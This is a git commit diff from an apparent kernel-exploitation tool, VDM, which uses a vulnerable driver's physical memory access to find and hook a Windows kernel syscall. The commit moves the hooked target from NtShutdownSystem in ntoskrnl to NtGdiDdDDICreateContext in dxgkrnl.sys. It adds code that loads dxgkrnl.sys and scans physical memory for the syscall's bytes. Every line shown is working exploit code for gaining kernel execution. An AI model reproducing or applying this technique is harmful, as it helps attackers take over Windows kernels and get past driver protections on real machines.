changed from NtShutdownSystem to a dxgkrnl export

4 years ago · e52add0a3e
parent 4a9b03aafa
commit e52add0a3e
3 changed files with 15 additions and 12 deletions
--- a/VDM/main.cpp
+++ b/VDM/main.cpp
@ -29,8 +29,8 @@ int __cdecl main(int argc, char** argv)
 		ntoskrnl_base,
 		sizeof mz_bytes
 	);
-	std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);

+	std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
 	if (!vdm::unload_drv(drv_handle, drv_key))
 	{
 		std::printf("[!] unable to unload vulnerable driver...\n");
--- a/VDM/vdm_ctx/vdm_ctx.cpp
+++ b/VDM/vdm_ctx/vdm_ctx.cpp
@ -4,18 +4,19 @@ namespace vdm
 {
 	vdm_ctx::vdm_ctx()
 	{
+		LoadLibraryA("user32.dll"); // required for win32u.dll...
+		vdm::dxgkrnl_buffer = reinterpret_cast<std::uint8_t*>(
+			LoadLibraryEx("drivers\\dxgkrnl.sys", NULL,
+				DONT_RESOLVE_DLL_REFERENCES));
+
 		nt_rva = reinterpret_cast<std::uint32_t>(
 			util::get_kernel_export(
-				"ntoskrnl.exe",
+				"dxgkrnl.sys",
 				syscall_hook.first,
 				true
 			));

-		nt_page_offset = nt_rva % PAGE_4KB;
-		ntoskrnl_buffer = reinterpret_cast<std::uint8_t*>(
-			LoadLibraryEx("ntoskrnl.exe", NULL, 
-				DONT_RESOLVE_DLL_REFERENCES));
-
+		vdm::nt_page_offset = nt_rva % PAGE_4KB;
 		// for each physical memory range, make a thread to search it
 		std::vector<std::thread> search_threads;
 		for (auto ranges : util::pmem_ranges)
@ -50,7 +51,7 @@ namespace vdm

 			// check the first 32 bytes of the syscall, if its the same, test that its the correct
 			// occurrence of these bytes (since ntoskrnl is loaded into physical memory at least 2 times now)...
-			if (!memcmp(page_data + nt_page_offset, ntoskrnl_buffer + nt_rva, 32))
+			if (!memcmp(page_data + nt_page_offset, dxgkrnl_buffer + nt_rva, 32))
 				if (valid_syscall(reinterpret_cast<void*>(address + page + nt_page_offset)))
 					syscall_address.store(
 						reinterpret_cast<void*>(
@ -67,7 +68,7 @@ namespace vdm

 		static const auto proc =
 			GetProcAddress(
-				GetModuleHandleA(syscall_hook.second),
+				LoadLibraryA(syscall_hook.second),
 				syscall_hook.first
 			);

--- a/VDM/vdm_ctx/vdm_ctx.h
+++ b/VDM/vdm_ctx/vdm_ctx.h
@ -10,13 +10,15 @@

 namespace vdm
 {
-	constexpr std::pair<const char*, const char*> syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
+	// change this to whatever you want :^)
+	constexpr std::pair<const char*, const char*> syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" };
+
 	inline std::atomic<bool> is_page_found = false;
 	inline std::atomic<void*> syscall_address = nullptr;

 	inline std::uint16_t nt_page_offset;
 	inline std::uint32_t nt_rva;
-	inline std::uint8_t* ntoskrnl_buffer;
+	inline std::uint8_t* dxgkrnl_buffer;

 	class vdm_ctx
 	{
@ -27,7 +29,7 @@ namespace vdm
 		{
 			static const auto proc = 
 				GetProcAddress(
-					GetModuleHandleA(syscall_hook.second),
+					LoadLibraryA(syscall_hook.second),
 					syscall_hook.first
 				);